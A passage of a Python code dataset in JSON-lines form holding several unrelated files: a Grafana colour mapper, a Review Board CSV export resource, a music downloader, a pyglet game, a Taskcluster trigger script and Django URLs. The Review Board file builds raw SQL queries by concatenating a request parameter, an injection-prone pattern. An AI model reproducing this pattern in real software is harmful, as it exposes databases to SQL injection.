{"api_name": "form.is_valid", "line_number": 108, "usage_type": "call"}, {"api_name": "form.cleaned_data", "line_number": 109, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 110, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 110, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 110, "usage_type": "name"}, {"api_name": "models.Payment.objects.filter", "line_number": 111, "usage_type": "call"}, {"api_name": "models.Payment.objects", "line_number": 111, "usage_type": "attribute"}, {"api_name": "models.Payment", "line_number": 111, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 114, "usage_type": "call"}]} +{"seq_id": "538540994", "text": "#!/usr/bin/env python3\n\nimport sys\nimport json\nfrom urllib.request import urlopen\nimport subprocess\n\ndef apply_wlcg_mapping(grafana_dashboard_definition_filename):\n with open('grafana_color_scheme.ini', 'r') as f:\n color_scheme = f.read().split(',')\n \n urls = [\"http://wlcg-cric.cern.ch/api/core/rcsite/query/?json&state=ANY\",\n \"http://wlcg-cric.cern.ch/api/core/federation/query/?json\"]\n \n wlcg_mappings = set()\n \n for url in urls:\n response = urlopen(url)\n wlcg_data = response.read().decode(\"utf-8\")\n wlcg_data = json.loads(wlcg_data)\n \n wlcg_mappings.update(wlcg_data.keys())\n \n with open('colourmapper.ini', 'w') as f:\n f.write('[Colours]\\n')\n\n for index, obj in enumerate(wlcg_mappings):\n f.write(f'{obj} = {color_scheme[index % len(color_scheme)]}\\n')\n \n subprocess.call(['python3', 'colourmapper.py', grafana_dashboard_definition_filename])\n\nif __name__ == '__main__':\n apply_wlcg_mapping(sys.argv[1])\n", "sub_path": "wlcg_colourmapper.py", "file_name": "wlcg_colourmapper.py", "file_ext": "py", "file_size_in_byte": 1032, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "urllib.request.urlopen", "line_number": 18, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 20, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 30, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 33, "usage_type": "attribute"}]} +{"seq_id": "132090016", "text": "# This file handles the request from UI to get the details 
for a particular review\n#\n# It connects to the MySQL DB and returns the data in CSV format to the frontend.\n# The data format is similar to the 'Review Log Tracker' of HSC BMS.\n\nfrom reviewboard.webapi.base import WebAPIResource\nimport logging\nimport MySQLdb\nimport ast\nimport csv\nimport io\nfrom datetime import datetime\n\n\nDB_IP = '127.0.0.1'\nDB_PORT = 3306\nUSER = \"\"\nPASSWD = \"\"\nDB_NAME = \"\"\n\n# For data received from DB\ndata = []\n\n\nclass HscReportResourceExportCsv(WebAPIResource):\n \"\"\"HscReports class returns data in the HSC Excel format.\"\"\"\n # name in web api link.\n name = 'hsc_export_csv'\n\n # name in api request.\n uri_name = 'export'\n\n # methods allowed for this resource.\n allowed_methods = ('GET', 'POST')\n logging.debug(\"Hello HSC Reports\")\n\n\n # hardcoded data\n ph_detect = 'Code Review (Internal)'\n ph_inject = ' '\n cause = ' '\n disp_pre = ' '\n fix_in_rev = ' '\n on_rev = ' '\n\n # Header for the CSV file\n header = ['S.No','Location','Phase Detected','Defect Severity','Description','Disposition (Pre-Meeting)',\n 'Disposition (Post-Meeting)','Disposition Comment','Date Approved','Date Closed',\n 'Fixed in Revision','Reviewer','Date Created','On Revision','Defect Category','Phase Injected',\n 'Defect Cause']\n\n # GET request handling.\n def get_list(self, request, *args, **kwargs):\n req_id = request.GET['req_id']\n comment_data = self.get_rvw_detail(req_id)\n return 200, {self.item_result_key: {'data': comment_data}}\n\n # POST request handling.\n def create(self, request, api_format, *args, **kwargs):\n logging.debug(\"POST: Hello HSC\")\n comment_data = self.get_rvw_detail(request.POST['req_id']) # read req_id from the POST data (it was previously undefined here)\n return 200, {self.item_result_key: {'data': comment_data}}\n\n\n # Convert the RB status to HSC report status\n def match_status(self, x):\n return {\n 'R': 'Accepted',\n 'D': 'Rejected',\n }.get(x, ' ')\n\n # Convert the RB category to HSC report category\n def match_category(self, x):\n return {\n 'std': 'Standards',\n 'func': 'Functional',\n 'poor': 'Poor Practice',\n 'logical': 'Logical',\n 'ppt': 'Presentation/Documentation',\n 'query': 'Query/Clarification/Recommendation',\n }.get(x, ' ')\n\n\n # Convert the RB severity to HSC report severity\n def match_severity(self, x):\n return {\n 'critical': 'Critical',\n 'major': 'Major',\n 'minor': 'Minor',\n 'enhancement': 'Enhancement',\n }.get(x, ' ')\n\n\n # Convert the RB cause to HSC BMS template\n def match_cause(self, x):\n return {\n 'requirement': 'Ambiguous Requirements',\n 'design': 'Design Error',\n 'stdfollow': 'Standards not followed',\n 'stdupd': 'Standards needs updation',\n 'knowledge': 'Lack of Knowledge',\n 'oversight': 'Oversight',\n 'dataerr': 'Data Error',\n 'config': 'Incorrect Configuration',\n 'hardware': 'Hardware Issue',\n 'trace': 'Traceability Not followed',\n }.get(x, ' ')\n\n\n # Convert the RB phase injected to HSC BMS values\n def match_phase_injected(self, x):\n return {\n 'reqmt': 'Requirement',\n 'design': 'Design',\n 'code': 'Coding',\n 'test': 'Testing',\n }.get(x, ' ')\n\n #Fetch details for the given request Id of the given repository\n # Arguments:\n # rvwId:(number) \n # Return:\n # CSV formatted string\n #\n def get_rvw_detail(self, rvwId):\n\n try:\n csv_output = io.BytesIO()\n writer = csv.writer(csv_output)\n\n # Query to get the meta info of the review\n meta_info_query = \"select rr.summary, rr.time_added, au.first_name, au.last_name, scm.name \"\\\n \" from reviews_reviewrequest rr, auth_user au, scmtools_tool scm, scmtools_repository scm_repo \"\\\n \" where 
rr.submitter_id=au.id and rr.id=\" + str(rvwId) + \" and rr.repository_id=scm_repo.id \"\\\n \" and scm_repo.tool_id=scm.id\"\n\n logging.debug(\"meta_info_query:%s\",meta_info_query)\n\n # Open database connection\n db = MySQLdb.connect(DB_IP, USER, PASSWD, DB_NAME)\n\n # prepare a cursor object using cursor() method\n cursor = db.cursor()\n\n cursor.execute(meta_info_query)\n metadata = cursor.fetchall()\n\n # Write meta info to the buffer in CSV format\n writer.writerow([\"Review Title\", metadata[0][0]])\n writer.writerow([\"Author name\", metadata[0][2] + \" \" + metadata[0][3]])\n writer.writerow([\"Review Initiation Date\", metadata[0][1].strftime('%m/%d/%Y')])\n repo_type = metadata[0][4]\n logging.debug(\"repo type:%s\",repo_type)\n\n\n # Query to get the reviewers\n reviewer_info_query = \"select DISTINCT au.email \"\\\n \"from reviews_reviewrequest rr, reviews_reviewrequest_target_groups tg, \"\\\n \"reviews_group_users gu, auth_user au, reviews_reviewrequest_target_people tp \"\\\n \"where rr.id=\" + str(rvwId) + \" and \"\\\n \"((tg.reviewrequest_id=rr.id and gu.group_id=tg.group_id and au.id=gu.user_id) or \"\\\n \"(tp.reviewrequest_id=rr.id and tp.user_id=au.id))\"\n\n # prepare a cursor object using cursor() method\n cursor = db.cursor()\n cursor.execute(reviewer_info_query)\n reviewer_data = cursor.fetchall()\n\n reviewer_list = ''\n for list in reviewer_data:\n reviewer_list += list[0] + ','\n writer.writerow([\"Target Reviewers\", reviewer_list])\n\n # Query to get the number of file diffset and their timestamps\n # If num > 1, reviewee has uploaded a new diff.\n filediffset_query = \"select timestamp from diffviewer_diffset where history_id=\" + str(rvwId)\n\n cursor.execute(filediffset_query)\n data = cursor.fetchall()\n\n comment_fix_dtm = None\n if len(data) > 1:\n comment_fix_dtm = data[len(data)-1]\n\n # Query to get the ship time and date\n ship_info_query = \"select timestamp from reviews_review where ship_it=1 and review_request_id=\" + str(rvwId)\n\n cursor.execute(ship_info_query)\n data = cursor.fetchall()\n\n ship_dtm = None\n if len(data) > 0:\n ship_dtm = data[len(data)-1]\n\n # Query to get the diff revision information of the review\n rev_info_query = \"select rr.id as rid, ds.id as did, ds.revision, fd.id as fid, fd.dest_file, fd.dest_detail \\\n from reviews_reviewrequest rr, diffviewer_diffset ds, diffviewer_filediff fd \\\n where ds.id=fd.diffset_id \\\n and rr.diffset_history_id=ds.history_id \\\n and rr.id=\" + str(rvwId)\n\n cursor.execute(rev_info_query)\n rev_data = cursor.fetchall()\n\n # To safe-guard against any indexing errors\n try:\n if len(rev_data) > 1:\n if repo_type == 'Subversion':\n # Get the last one and strip the () chars\n self.fix_in_rev = rev_data[len(rev_data)-1][5][1:-1]\n elif repo_type == 'ClearCase': \n # Get the last one and get the version info\n file_name = rev_data[len(rev_data)-1][4]\n version_info_index = file_name.rfind('@') + 1\n self.fix_in_rev = file_name[version_info_index:]\n elif repo_type == 'Git': \n self.fix_in_rev = rev_data[len(rev_data)-1][5]\n else:\n logging.error('Unsupported repo type:%s',repo_type)\n except Exception as e:\n logging.error(\"********Error [%d]: %s\" % (e.args[0], e.args[1]))\n self.fix_in_rev = ' '\n\n # repo specific query conditions\n # In case of SVN, fetch the dest_detail\n\n\n # Query to get all the comments for this review\n all_data_query = \"select reviews_comment.id, au.first_name, au.last_name, \\\n reviews_comment.text, reviews_comment.issue_opened, \\\n 
reviews_comment.issue_status, reviews_comment.reply_to_id, reviews_comment.extra_data, \\\n reviews_comment.first_line, reviews_comment.num_lines, reviews_comment.timestamp, \\\n diffviewer_filediff.dest_file, diffviewer_filediff.dest_detail \\\n from ((((((reviews_review \\\n left join reviews_reviewrequest \\\n on reviews_review.review_request_id = reviews_reviewrequest.id) \\\n left join auth_user \\\n on auth_user.id = reviews_reviewrequest.submitter_id) \\\n left join reviews_review_comments \\\n on reviews_review.id = reviews_review_comments.review_id) \\\n left join reviews_comment \\\n on reviews_review_comments.comment_id = reviews_comment.id) \\\n left join auth_user au \\\n on au.id = reviews_review.user_id) \\\n left join diffviewer_filediff \\\n on diffviewer_filediff.id = reviews_comment.filediff_id) \\\n where reviews_review.review_request_id = \" + str(rvwId)\n\n cursor.execute(all_data_query)\n data = cursor.fetchall()\n db.close()\n\n # Write table header to the buffer in CSV format\n writer.writerow(self.header)\n except MySQLdb.Error as e:\n logging.error(\"********MySQL Error [%d]: %s\" % (e.args[0], e.args[1]))\n\n all_data={}\n comment_count = 1;\n for id, rvwr_fname, rvwr_lname, txt, is_issue, status, reply_id, ext_data, first_line, num_lines, ts, file, version in data:\n logging.debug(\"txt:%s, file:%s, version:%s\",txt,file,version)\n if is_issue:\n comment_data = {}\n comment_data['num'] = comment_count\n\n # Set the file name and On revision\n if repo_type == 'Subversion':\n # Get the last one and strip the () chars\n comment_data['on_rev'] = version[1:-1]\n elif repo_type == 'ClearCase': \n # Get the last one and get the version info\n version_info_index = file.rfind('@')\n comment_data['on_rev'] = file[version_info_index + 1:]\n file = file[:version_info_index - 1]\n elif repo_type == 'Git': \n comment_data['on_rev'] = version\n else:\n logging.error('Unsupported repotype:%s',repo_type)\n\n comment_data['loc'] = file + ':' + str(first_line)\n if num_lines > 1:\n comment_data['loc'] += '-' + str(first_line+num_lines-1)\n comment_data['reviewer'] = rvwr_fname + ' ' + rvwr_lname\n ext_data_dic = ast.literal_eval(ext_data)\n if 'severity' in ext_data_dic:\n comment_data['severity'] = self.match_severity(ext_data_dic[\"severity\"])\n else:\n comment_data['severity'] = ' ';\n if 'category' in ext_data_dic:\n comment_data['category'] = self.match_category(ext_data_dic[\"category\"])\n else:\n comment_data['category'] = ' ';\n if 'cause' in ext_data_dic:\n comment_data['cause'] = self.match_cause(ext_data_dic[\"cause\"])\n else:\n comment_data['cause'] = ' ';\n if 'phase' in ext_data_dic:\n comment_data['ph_inject'] = self.match_phase_injected(ext_data_dic[\"phase\"])\n else:\n comment_data['ph_inject'] = ' ';\n comment_data['desc'] = txt\n comment_data['disp'] = self.match_status(status)\n comment_data['create_dtm'] = ts.strftime('%m/%d/%Y')\n comment_data['disp_txt'] = ''\n all_data[str(id)] = comment_data\n if comment_fix_dtm is not None:\n comment_data['fix_date'] = comment_fix_dtm[0].strftime('%m/%d/%Y')\n else:\n comment_data['fix_date'] = ' '\n if ship_dtm is not None:\n comment_data['approve_date'] = ship_dtm[0].strftime('%m/%d/%Y')\n else:\n comment_data['approve_date'] = ' '\n\n comment_count = comment_count + 1\n else:\n if str(reply_id) in all_data:\n if (all_data[str(reply_id)]['disp_txt'] == ''):\n all_data[str(reply_id)]['disp_txt'] = rvwr_fname + ' ' + rvwr_lname + ': ' + txt\n else:\n # Append the reviewer name and his/her comment\n 
all_data[str(reply_id)]['disp_txt'] = all_data[str(reply_id)]['disp_txt'] + \\\n '\\n' + \\\n rvwr_fname + ' ' + rvwr_lname + ': ' + txt\n all_data[str(reply_id)]['fix_date'] = ts.strftime('%m/%d/%Y')\n\n\n # Write table contents to the buffer in CSV format\n for row in sorted(all_data):\n writer.writerow([all_data[row]['num'], all_data[row]['loc'], self.ph_detect, all_data[row]['severity'], \n all_data[row]['desc'], self.disp_pre, all_data[row]['disp'], all_data[row]['disp_txt'],\n all_data[row]['approve_date'], all_data[row]['fix_date'], self.fix_in_rev, all_data[row]['reviewer'],\n all_data[row]['create_dtm'], all_data[row]['on_rev'], all_data[row]['category'], all_data[row]['ph_inject'], all_data[row]['cause']])\n\n return csv_output.getvalue()\n\n\nhscreport_resource_export_csv = HscReportResourceExportCsv()\n", "sub_path": "hscreports/hscreports/resourceExportCsv.py", "file_name": "resourceExportCsv.py", "file_ext": "py", "file_size_in_byte": 14876, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "reviewboard.webapi.base.WebAPIResource", "line_number": 25, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 35, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 60, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 128, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 129, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 137, "usage_type": "call"}, {"api_name": "MySQLdb.connect", "line_number": 140, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 153, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 219, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 221, "usage_type": "call"}, {"api_name": "MySQLdb.Error", "line_number": 255, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 256, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 261, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 278, "usage_type": "call"}, {"api_name": "ast.literal_eval", "line_number": 284, "usage_type": "call"}]} +{"seq_id": "466316253", "text": "import io\r\nimport os\r\nimport urllib.request\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\n\r\nAUTHOR = 'Vu Dinh Anh'\r\nVERSION = '0.0.0'\r\n\r\nDEFAULT_PATH = 'CSN_downloader'\r\n\r\nDOWNLOAD_QUALITY = ['32kbps', '128kbps', '320kbps', '500kbps', 'Lossless']\r\n\r\n\r\ndef download_music_file(url):\r\n cwd = os.getcwd() # current working directory\r\n file_name = url.split('/')[-1]\r\n file_name = file_name[file_name.index('v5=') + 3:]\r\n file_name = urllib.request.unquote(file_name) # get file name, escape from URL pattern\r\n if not os.path.exists(cwd + '\\\\' + DEFAULT_PATH):\r\n os.makedirs(cwd + '\\\\' + DEFAULT_PATH)\r\n\r\n path_to_save = cwd + '\\\\' + DEFAULT_PATH + '\\\\' + file_name\r\n\r\n r = requests.get(url)\r\n with io.open(path_to_save, 'wb')as f:\r\n f.write(r.content)\r\n\r\n print(\"Downloaded :\" + file_name)\r\n\r\n\r\ndef get_download_url(page):\r\n content = get_page_content(url=page)\r\n soup = BeautifulSoup(content, 'html.parser')\r\n download_div = soup.find('div', attrs={'id': 'downloadlink2'}) # div contain all download option\r\n\r\n download_urls = list()\r\n anchor_tags = download_div.find_all('a')\r\n for anchor_tag in anchor_tags:\r\n download_urls.append(anchor_tag['href'])\r\n\r\n return download_urls\r\n\r\n\r\ndef get_page_content(url):\r\n 
return requests.get(url=url).content\r\n\r\n\r\ndef get_all_download_pages(content):\r\n soup = BeautifulSoup(content, 'html.parser')\r\n table = soup.find('table', attrs={'border': '0', 'class': 'tbtable'})\r\n all_anchor_tags = table.find_all('a', attrs={'target': '_blank'}) # only download link has 'taget' : '_blank' attr\r\n download_links = list() # for storing download_link\r\n for anchor_tag in all_anchor_tags:\r\n download_links.append(anchor_tag['href']) # get download link from 'a' tag\r\n return download_links\r\n\r\n\r\ndef main():\r\n # get url\r\n url = input(\"Enter url: \")\r\n\r\n content = get_page_content(url=url)\r\n list_download_page = get_all_download_pages(content=content)\r\n\r\n # get quality\r\n print(DOWNLOAD_QUALITY)\r\n quality = input(\"Enter download quality: \")\r\n while quality not in DOWNLOAD_QUALITY:\r\n print(\"Invalid input. Please try again.\")\r\n quality = input(\"Enter download quality: \")\r\n\r\n custom_path = input('Enter folder to save (Enter to skip): ')\r\n if custom_path is not '':\r\n global DEFAULT_PATH\r\n DEFAULT_PATH += '\\\\' + custom_path\r\n\r\n for download_page in list_download_page:\r\n download_urls = get_download_url(page=download_page)\r\n if any(quality in u for u in download_urls):\r\n for u in download_urls:\r\n if (quality in u):\r\n download_music_file(u)\r\n else:\r\n #if user's quality choosen is not available for download, find the nearest download quality\r\n for q in DOWNLOAD_QUALITY[DOWNLOAD_QUALITY.index(quality) - 1::-1]:\r\n keep_find_quality = True\r\n for u in download_urls:\r\n if (q in u):\r\n download_music_file(u)\r\n keep_find_quality = False\r\n if keep_find_quality is False:\r\n break\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n", "sub_path": "CSN_downloader_public.py", "file_name": "CSN_downloader_public.py", "file_ext": "py", "file_size_in_byte": 3238, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.getcwd", "line_number": 17, "usage_type": "call"}, {"api_name": "urllib.request.request.unquote", "line_number": 20, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 20, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 20, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 22, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 26, "usage_type": "call"}, {"api_name": "io.open", "line_number": 27, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 35, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 47, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "600182904", "text": "import pyglet\n\nfrom game import resources, load\n\nfrom game.physicalobject import PhysicalObject\nfrom game.player import Player\n\ngame_window = pyglet.window.Window(800, 600)\n\nmain_batch = pyglet.graphics.Batch()\n\nfps_display = pyglet.clock.ClockDisplay()\n\nscore_label = pyglet.text.Label(text=\"Score: 0\", x=10, y=575, batch=main_batch)\nlevel_label = pyglet.text.Label(text=\"PyGlet Asteroids Game\",\n x=400, y=575,\n anchor_x='center',\n batch=main_batch)\n\nplayer_ship = Player(x=400, y=300, batch=main_batch)\nplayer_ship.rotation = 270\ngame_window.push_handlers(player_ship)\n\nasteroids = load.asteroids(3, 
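The downloader above fetches each track with a plain requests.get and writes r.content in one shot, so every file is held fully in memory first. A hedged alternative using requests' streaming API; the chunk size and function name are arbitrary choices, not from the source:

import requests

def save_stream(url, path, chunk_size=8192):
    # stream=True defers the body; iter_content() then pulls it in chunks
    with requests.get(url, stream=True) as r:
        r.raise_for_status()
        with open(path, 'wb') as f:
            for chunk in r.iter_content(chunk_size=chunk_size):
                f.write(chunk)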
player_ship.position, batch=main_batch)\n\ngame_objects = [player_ship] + asteroids\n\nplayer_lives = load.player_lives(3, batch=main_batch)\n\n@game_window.event\ndef on_draw():\n game_window.clear()\n fps_display.draw()\n main_batch.draw()\n\ndef update(dt):\n for obj in game_objects:\n obj.update(dt)\n\nif __name__ == '__main__':\n pyglet.clock.schedule_interval(update, 1/120.0)\n pyglet.app.run()\n", "sub_path": "version2/asteroids.py", "file_name": "asteroids.py", "file_ext": "py", "file_size_in_byte": 1106, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pyglet.window.Window", "line_number": 8, "usage_type": "call"}, {"api_name": "pyglet.window", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pyglet.graphics.Batch", "line_number": 10, "usage_type": "call"}, {"api_name": "pyglet.graphics", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pyglet.clock.ClockDisplay", "line_number": 12, "usage_type": "call"}, {"api_name": "pyglet.clock", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pyglet.text.Label", "line_number": 14, "usage_type": "call"}, {"api_name": "pyglet.text", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pyglet.text.Label", "line_number": 15, "usage_type": "call"}, {"api_name": "pyglet.text", "line_number": 15, "usage_type": "attribute"}, {"api_name": "game.player.Player", "line_number": 20, "usage_type": "call"}, {"api_name": "game.load.asteroids", "line_number": 24, "usage_type": "call"}, {"api_name": "game.load", "line_number": 24, "usage_type": "name"}, {"api_name": "game.load.player_lives", "line_number": 28, "usage_type": "call"}, {"api_name": "game.load", "line_number": 28, "usage_type": "name"}, {"api_name": "pyglet.clock.schedule_interval", "line_number": 41, "usage_type": "call"}, {"api_name": "pyglet.clock", "line_number": 41, "usage_type": "attribute"}, {"api_name": "pyglet.app.run", "line_number": 42, "usage_type": "call"}, {"api_name": "pyglet.app", "line_number": 42, "usage_type": "attribute"}]} +{"seq_id": "366441084", "text": "import json\nimport os\nimport slugid\nimport taskcluster\nimport urllib.request\nfrom cib import createTask, updateWorkerPool\n\n\nworkerManager = taskcluster.WorkerManager(taskcluster.optionsFromEnvironment())\nqueue = taskcluster.Queue(taskcluster.optionsFromEnvironment())\ncommit = json.loads(urllib.request.urlopen(urllib.request.Request('https://api.github.com/repos/mozilla-platform-ops/cloud-image-builder/commits/{}'.format(os.getenv('TRAVIS_COMMIT')), None, { 'User-Agent' : 'Mozilla/5.0' })).read().decode())['commit']\n\nupdateWorkerPool(\n workerManager = workerManager,\n configPath = 'ci/config/worker-pool/relops/decision.yaml',\n workerPoolId = 'relops/decision')\nupdateWorkerPool(\n workerManager = workerManager,\n configPath = 'ci/config/worker-pool/relops/win2019.yaml',\n workerPoolId = 'relops/win2019')\n\ncreateTask(\n queue = queue,\n image = 'python',\n taskId = slugid.nice(),\n taskName = '00 :: decision task',\n taskDescription = 'determine which windows cloud images should be built, where they should be deployed and trigger appropriate build tasks for the same',\n provisioner = 'relops',\n workerType = 'decision',\n features = {\n 'taskclusterProxy': True\n },\n env = {\n 'GITHUB_HEAD_SHA': os.getenv('TRAVIS_COMMIT')\n },\n commands = [\n '/bin/bash',\n '--login',\n '-c',\n 'git clone https://github.com/mozilla-platform-ops/cloud-image-builder.git && pip install azure boto3 pyyaml slugid 
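The asteroids record leans on two pyglet idioms: a single graphics.Batch so on_draw issues one draw call for every sprite and label, and clock.schedule_interval driving fixed-rate updates. A self-contained sketch of that skeleton; the label and tick counter are placeholders, not from the game:

import pyglet

window = pyglet.window.Window(400, 300)
batch = pyglet.graphics.Batch()
label = pyglet.text.Label('tick: 0', x=10, y=10, batch=batch)
state = {'ticks': 0}

@window.event
def on_draw():
    window.clear()
    batch.draw()  # everything registered with the batch renders in this one call

def update(dt):
    state['ticks'] += 1
    label.text = 'tick: %d' % state['ticks']

pyglet.clock.schedule_interval(update, 1 / 120.0)  # same 120 Hz cadence the game schedules
pyglet.app.run()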
taskcluster urllib3 && cd cloud-image-builder && git reset --hard {} && python ci/{}.py'.format(os.getenv('TRAVIS_COMMIT'), 'pool-deploy' if commit['message'].startswith('pool-deploy') else 'create-image-build-tasks')\n ],\n scopes = [\n 'generic-worker:os-group:relops/win2019/Administrators',\n 'generic-worker:run-as-administrator:relops/*',\n 'queue:create-task:highest:relops/*',\n 'queue:create-task:very-high:relops/*',\n 'queue:create-task:high:relops/*',\n 'queue:create-task:medium:relops/*',\n 'queue:create-task:low:relops/*',\n 'queue:route:index.project.relops.cloud-image-builder.*',\n 'queue:scheduler-id:-',\n 'worker-manager:manage-worker-pool:gecko-1/win*',\n 'worker-manager:manage-worker-pool:gecko-3/win*',\n 'worker-manager:manage-worker-pool:gecko-t/win*',\n 'worker-manager:manage-worker-pool:mpd001-1/win*',\n 'worker-manager:manage-worker-pool:mpd001-3/win*',\n 'worker-manager:manage-worker-pool:relops/win*',\n 'worker-manager:provider:aws',\n 'worker-manager:provider:azure',\n 'secrets:get:project/relops/image-builder/dev'\n ]\n)\n", "sub_path": "ci/trigger-decision-task.py", "file_name": "trigger-decision-task.py", "file_ext": "py", "file_size_in_byte": 2525, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "taskcluster.WorkerManager", "line_number": 9, "usage_type": "call"}, {"api_name": "taskcluster.optionsFromEnvironment", "line_number": 9, "usage_type": "call"}, {"api_name": "taskcluster.Queue", "line_number": 10, "usage_type": "call"}, {"api_name": "taskcluster.optionsFromEnvironment", "line_number": 10, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 11, "usage_type": "call"}, {"api_name": "urllib.request.request.urlopen", "line_number": 11, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 11, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 11, "usage_type": "name"}, {"api_name": "urllib.request.request.Request", "line_number": 11, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 11, "usage_type": "call"}, {"api_name": "cib.updateWorkerPool", "line_number": 13, "usage_type": "call"}, {"api_name": "cib.updateWorkerPool", "line_number": 17, "usage_type": "call"}, {"api_name": "cib.createTask", "line_number": 22, "usage_type": "call"}, {"api_name": "slugid.nice", "line_number": 25, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 34, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "228610634", "text": "from apps.pagos import views\nfrom django.conf.urls import patterns, url\nfrom django.views.generic import TemplateView\n\nurlpatterns = patterns('',\n\n url(r'^estado/de/cuenta/$',\n views.CompromisosListaView.as_view(),\n name='pst_compromisos_pago'),\n\n url(r'^compromisos/de/pago.json/$',\n views.compromiso_pago_json,\n name='pst_compromisos_pago_json'),\n\n url(r'^compromisos/de/pago/nuevo/$',\n views.compromiso_pago_nuevo,\n name='pst_compromisos_pago_nuevo'),\n\n url(r'^compromisos/de/pago/pdf/(?P\\d+)/$',\n views.planilla_pago_pdf,\n name='pst_compromisos_pago_pdf'),\n\n url(r'^compromisos/de/pago/1/$',\n TemplateView.as_view(template_name='pagos/pst/detalle_compromiso_pago.html'),\n name='pst_detalle_compromiso_pago'),\n\n url(r'^indebido/$',\n views.PagoIndebidoView.as_view(),\n name='pst_pago_indebido'),\n\n url(r'^indebido/reconocimientos/$',\n views.CesionesPagoIndebidoView.as_view(),\n name='pst_reconocimientos_pago_indebido'),\n\n 
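The trigger script above decides which CI entry point the decision task runs by inspecting the head commit's message prefix. That gating is easy to isolate; a sketch assuming a commit SHA is already at hand (the SHA below is a dummy, where the real script reads TRAVIS_COMMIT from the environment):

import json
import urllib.request

sha = '0' * 40  # dummy SHA for illustration only
req = urllib.request.Request(
    'https://api.github.com/repos/mozilla-platform-ops/cloud-image-builder/commits/%s' % sha,
    None, {'User-Agent': 'Mozilla/5.0'})
commit = json.loads(urllib.request.urlopen(req).read().decode())['commit']

# prefix convention: 'pool-deploy...' messages jump straight to deployment
script = 'pool-deploy' if commit['message'].startswith('pool-deploy') else 'create-image-build-tasks'
print('decision task would run ci/%s.py' % script)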
)\n", "sub_path": "apps/pagos/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1471, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.conf.urls.patterns", "line_number": 5, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "apps.pagos.views.CompromisosListaView.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "apps.pagos.views.CompromisosListaView", "line_number": 8, "usage_type": "attribute"}, {"api_name": "apps.pagos.views", "line_number": 8, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "apps.pagos.views.compromiso_pago_json", "line_number": 12, "usage_type": "attribute"}, {"api_name": "apps.pagos.views", "line_number": 12, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "apps.pagos.views.compromiso_pago_nuevo", "line_number": 16, "usage_type": "attribute"}, {"api_name": "apps.pagos.views", "line_number": 16, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 19, "usage_type": "call"}, {"api_name": "apps.pagos.views.planilla_pago_pdf", "line_number": 20, "usage_type": "attribute"}, {"api_name": "apps.pagos.views", "line_number": 20, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 23, "usage_type": "call"}, {"api_name": "django.views.generic.TemplateView.as_view", "line_number": 24, "usage_type": "call"}, {"api_name": "django.views.generic.TemplateView", "line_number": 24, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 27, "usage_type": "call"}, {"api_name": "apps.pagos.views.PagoIndebidoView.as_view", "line_number": 28, "usage_type": "call"}, {"api_name": "apps.pagos.views.PagoIndebidoView", "line_number": 28, "usage_type": "attribute"}, {"api_name": "apps.pagos.views", "line_number": 28, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 31, "usage_type": "call"}, {"api_name": "apps.pagos.views.CesionesPagoIndebidoView.as_view", "line_number": 32, "usage_type": "call"}, {"api_name": 